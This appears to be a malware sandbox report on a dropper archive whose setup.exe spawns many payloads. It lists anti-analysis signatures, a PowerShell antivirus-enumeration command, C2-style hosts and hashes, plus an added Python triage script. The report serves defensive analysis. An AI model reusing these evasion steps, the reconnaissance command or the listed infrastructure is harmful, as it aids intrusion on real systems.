| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 (LUID 35 = SeCreateSymbolicLinkPrivilege) | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
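The signature tables above are grouped by signature, which hides the question a responder actually asks: which of the three extracted setup.exe copies did what? The script below is an added example (not part of the report or the sandbox's own tooling) that parses rows in the "| Description | Indicator | Process | Target |" layout and pivots them by process. The sample input is a constructed subset of the behavioral1 rows above. The ANTI_ANALYSIS and MACHINE_STATE groupings and the KNOWN_PUBLIC_ROOTS lookup are the editor's assumptions, not something the report states; note that both thumbprints written under SystemCertificates are widely distributed public roots (Baltimore CyberTrust Root and ISRG Root X1), which is what Windows automatic root update installs when a process makes outbound TLS connections (the CryptnetUrlCache files listed above are the same mechanism), so that signature should be triaged as a side effect of the samples' network traffic rather than as a planted CA unless an unknown thumbprint shows up.

```python
"""Pivot sandbox signature tables by process.

Input format (as rendered in the report): a signature heading line followed by
"| Description | Indicator | Process | Target |" rows. Output: per-process
signature -> indicators, plus helpers for the two questions that matter in
triage (who does anti-analysis, who touches machine-wide state).
"""
import re
from collections import defaultdict

# Constructed sample: rows copied from the behavioral1 signature tables above.
# Signatures whose rows are entirely N/A carry nothing to pivot and are left
# out, except HideFromDebugger, which at least names the calling process.
SIGNATURE_TABLES = r"""
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe | N/A |
"""

# Editor's grouping (assumption, not the report's): signatures that indicate
# sandbox/debugger evasion versus signatures that change machine-wide state.
ANTI_ANALYSIS = {
    "Identifies VirtualBox via ACPI registry values (likely anti-VM)",
    "Checks BIOS information in registry",
    "Suspicious use of NtSetInformationThreadHideFromDebugger",
}
MACHINE_STATE = {"Drops file in System32 directory", "Modifies system certificate store"}

# Assumption (editor's own lookup, not from the report): SHA-1 thumbprints of
# two public root CAs that Windows installs on demand via automatic root update.
KNOWN_PUBLIC_ROOTS = {
    "D4DE20D05E66FC53FE1A50882C78DB2852CAE474": "Baltimore CyberTrust Root",
    "CABD2A79A1076A31F21D253635CB039D4329A5E8": "ISRG Root X1",
}
THUMBPRINT_RE = re.compile(r"\\Certificates\\([0-9A-F]{40})\b")


def parse_signature_tables(text):
    """Return (signature, description, indicator, process) for every data row."""
    rows, signature = [], None
    for raw in text.strip().splitlines():
        line = raw.strip()
        if not line.startswith("|"):
            signature = line  # a signature heading introduces the next table
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Description" or signature is None:
            continue  # column header or malformed line
        desc, indicator, process, _target = cells
        rows.append((signature, desc, indicator, process))
    return rows


def pivot_by_process(rows):
    """process -> signature -> set of indicators (empty set when only N/A)."""
    pivot = defaultdict(lambda: defaultdict(set))
    for signature, _desc, indicator, process in rows:
        bucket = pivot[process][signature]  # touch so N/A-only rows still register
        if indicator != "N/A":
            bucket.add(indicator)
    return pivot


def processes_matching(pivot, signatures, minimum=2):
    """Processes that triggered at least `minimum` of the given signatures."""
    return {proc: sorted(s for s in sigs if s in signatures)
            for proc, sigs in pivot.items()
            if len(set(sigs) & signatures) >= minimum}


def certificate_store_changes(rows):
    """Thumbprints written under SystemCertificates, labelled when they are a
    well-known public root (auto root update) rather than an unknown CA."""
    found = {}
    for signature, _desc, indicator, _proc in rows:
        match = THUMBPRINT_RE.search(indicator)
        if signature == "Modifies system certificate store" and match:
            found[match.group(1)] = KNOWN_PUBLIC_ROOTS.get(match.group(1), "UNKNOWN - inspect")
    return found


if __name__ == "__main__":
    parsed = parse_signature_tables(SIGNATURE_TABLES)
    by_proc = pivot_by_process(parsed)
    for proc, sigs in by_proc.items():
        print(proc)
        for sig, inds in sigs.items():
            print(f"  {sig}: {len(inds)} indicator(s)")
    print("anti-analysis:", list(processes_matching(by_proc, ANTI_ANALYSIS)))
    print("machine state:", list(processes_matching(by_proc, MACHINE_STATE, minimum=1)))
    print("cert store:", certificate_store_changes(parsed))
```

On this input all three setup.exe copies trip the anti-analysis cluster, while only the 7zO86AD1746 copy writes Group Policy files and certificate keys; that is the one to pull the memory dumps for first.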
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\file_release_4.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\file_release_4.rar"
C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zO86A9AAC6\setup.exe"
C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe
"C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe"
C:\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe
"C:\Users\Admin\Documents\GuardFox\A5CmtvxmOSm25U_v2W3gT72J.exe"
C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe
"C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe"
C:\Users\Admin\Documents\GuardFox\1eXwW8W0LQr4lKFVVhJkmQ9O.exe
"C:\Users\Admin\Documents\GuardFox\1eXwW8W0LQr4lKFVVhJkmQ9O.exe"
C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe
"C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe"
C:\Users\Admin\Documents\GuardFox\grJJOXisL53B7lk88iWMuUJd.exe
"C:\Users\Admin\Documents\GuardFox\grJJOXisL53B7lk88iWMuUJd.exe"
C:\Users\Admin\Documents\GuardFox\uK5XIHQ709h40q_3RXOWxPKt.exe
"C:\Users\Admin\Documents\GuardFox\uK5XIHQ709h40q_3RXOWxPKt.exe"
C:\Users\Admin\Documents\GuardFox\FAQhhDdJvDUvJ7Gg2HOVMW2l.exe
"C:\Users\Admin\Documents\GuardFox\FAQhhDdJvDUvJ7Gg2HOVMW2l.exe"
C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe
"C:\Users\Admin\Documents\GuardFox\hHz8UvhmNqdNyZGgBI24N_af.exe"
C:\Users\Admin\Documents\GuardFox\KJFWzmdhqKqcO1aK2C0lM0oL.exe
"C:\Users\Admin\Documents\GuardFox\KJFWzmdhqKqcO1aK2C0lM0oL.exe"
C:\Users\Admin\AppData\Local\Temp\is-7G3C8.tmp\1AGsAM7Y26Vr36pGSHA98hbO.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7G3C8.tmp\1AGsAM7Y26Vr36pGSHA98hbO.tmp" /SL5="$40186,4124890,54272,C:\Users\Admin\Documents\GuardFox\1AGsAM7Y26Vr36pGSHA98hbO.exe"
C:\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe
.\Install.exe /MFFdidt "525403" /S
C:\Users\Admin\AppData\Local\Temp\FF07.exe
C:\Users\Admin\AppData\Local\Temp\FF07.exe
C:\Users\Admin\AppData\Local\Temp\FF07.exe
C:\Users\Admin\AppData\Local\Temp\FF07.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
Network
| Country | Destination | Domain | Proto |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | triedchicken.net | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 8.8.8.8:53 | cleued.com | udp |
| US | 8.8.8.8:53 | def.bestsup.su | udp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| AR | 190.224.203.37:80 | cczhk.com | tcp |
| US | 172.67.171.112:80 | def.bestsup.su | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 104.21.67.206:80 | 294down-river.sbs | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 104.21.67.206:443 | 294down-river.sbs | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.69.242:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 172.67.180.119:443 | triedchicken.net | tcp |
| US | 104.21.69.242:443 | acenitive.shop | tcp |
| US | 104.21.69.242:443 | acenitive.shop | tcp |
| US | 104.21.4.60:443 | cleued.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| AR | 190.224.203.37:80 | cczhk.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| US | 8.8.8.8:53 | pergor.com | udp |
| US | 172.67.156.81:443 | pergor.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| GB | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | carthewasher.net | udp |
| US | 188.114.97.2:443 | carthewasher.net | tcp |
| US | 8.8.8.8:53 | 632432.site | udp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:80 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| RU | 87.240.132.78:443 | vk.com | tcp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 172.67.147.32:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | selebration17io.io | udp |
| RU | 91.215.85.120:80 | selebration17io.io | tcp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| DE | 194.55.13.50:9001 | | tcp |
| CA | 162.250.191.15:9001 | | tcp |
| GB | 81.0.248.210:443 | | tcp |
| GB | 81.0.248.210:443 | | tcp |
| CA | 162.250.191.15:9001 | | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe
| MD5 | 75f610245174c2efde63e6151866540b |
| SHA1 | 2b18891ce43a5a3f57139d81a35f9003f81a8a05 |
| SHA256 | 33c629c21254714bb3f9e6dc7e07946834d8d6bf2d017aeadaa3f597a3c7d21e |
| SHA512 | 4ca7f3f424e521877f0afe7ff66db5574f5c9685941f5af879acec3bbf7f7012529f68a6283d2444eb4c2fca4edfc4781d67371a95756894ba4f728873a3aac7 |
C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe
| MD5 | bf5915897ae58b6e618fe1de3cdcdb17 |
| SHA1 | 889072f7b9091692038249d82a71873c292bfb7a |
| SHA256 | 263da0ae0123cc731b43ea3c0cc6f353b0f58f03bff230243e860e6f80a6f904 |
| SHA512 | 4d5b68e9254aa91c58f54046c3f58bfa6260bf13c89da72c19601408158939591908f6172f6c7d70b8e624d330d73a563dc3af8e6f48e09f42a423f2c0bfc4aa |
memory/2664-32-0x0000000140000000-0x0000000140B9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe
| MD5 | 2bb083dc1d1d8af5b21514127d8e534c |
| SHA1 | 89dead2c592e2c858e4b4e1cdb3760ee1d7baddf |
| SHA256 | a4f0ae096faccc3b611abceaca562d0b067b0cc0181c00deabc36704eaac4b79 |
| SHA512 | cc4ca76b3cf2336c5ece29a1a946465d68f85cb001f59a7835629be08cc8674347123e3392de434c7fda8fee262e64f5d09fbe5f21cc61272e561fa5c657014d |
memory/2640-33-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/2640-34-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/2640-35-0x000007FEFD5C0000-0x000007FEFD62C000-memory.dmp
memory/2640-36-0x00000000002E0000-0x00000000002E1000-memory.dmp
memory/2640-37-0x000007FE80010000-0x000007FE80011000-memory.dmp
memory/2640-39-0x0000000077640000-0x00000000777E9000-memory.dmp
memory/2640-38-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/2640-41-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/2640-40-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/2640-43-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/2640-44-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/2640-42-0x0000000140000000-0x0000000140B9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab94E2.tmp
| MD5 | ac0e1346426666541627a9a2f8e72846 |
| SHA1 | 07db3d7686d9c899a68177e4914b9a7462adf1b9 |
| SHA256 | cd4c70f5892582960f985ac0c6569878589d07ded283c617f21d5996300e01b1 |
| SHA512 | 67286571db030a87789f1dff4cab9d203af05223b479499bce94efb248bc43eb5b08f6028f5cf35042489766a9a6ea93caeeb40dcee3e8b4bda1aa02ed538c42 |
C:\Users\Admin\AppData\Local\Temp\Tar9504.tmp
| MD5 | 0a672ba941d9814ccaed6b48151d778e |
| SHA1 | 2b26d7228d0985d466723cc9cfb2c2fab0c6fd86 |
| SHA256 | fbfa82d0d7b086b2f680d3bb4660c8f6dcbc7544710a633477fbd69575199825 |
| SHA512 | b565aba98125c9c444cfdf0e73df0eb297ee334f2e799cc62b2ba860b967acfb3fb0e5270aa28724a9660e93b5013f959bd0dbfd9547598e7804eadfaa43f51c |
C:\Users\Admin\AppData\Local\Temp\7zO86AD1746\setup.exe
| MD5 | 9dd56a34985e6829d4ed94e10ad1064a |
| SHA1 | b0f5c7415c298b1800dd36ef437dd2de87b9a17b |
| SHA256 | 53bd9c18cab7bcc98e5e0bc22a7ea0f55b258f12d55b56aa147808982605d3d4 |
| SHA512 | f3ceb16e164ebe36f7fd619136b8e1cdbbc034507f7cc914fc12b33cda60cf4016cd35d28ab18b496e530252cfca0a27667481a54a1a632a5907c79707b4dd3f |
memory/2640-87-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/2664-88-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/2640-93-0x0000000140000000-0x0000000140B9C000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe
| MD5 | b27008cc829387439a9a31fe652d8cce |
| SHA1 | 56b3072604a5ba570ed526697b5807ea8475a3b5 |
| SHA256 | 87890125269c772b583fb626b8824f20d0d348a2a2694e5a7aa21d9b59d567de |
| SHA512 | cfb89be99c1674b5a7d0830da8e38d8af63a1f5fd7e36be7ad953a19379b1821487954e5a3d950967da33588446e48e02c5ac2c2d6b1977e17ca68f052f89547 |
memory/2664-95-0x0000000140000000-0x0000000140B9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO86AF41E6\setup.exe
| MD5 | 98c7bd8444b2dc1c1093a00310f7cd02 |
| SHA1 | 235b76bbe5586208f18d132d4a973111d81b2de2 |
| SHA256 | 05b173bd4b8fcbe0b1ca42b1eda61fb160ff3ef09e416b9994ecb9d54e7081de |
| SHA512 | 65855a690b8b365a015ae20927159b1682a695a8cbe73cfae3b8fd295d709373b3049d9216b63248b731eadfb958a8b0f18aaf81004933f52c52d5d72256ec62 |
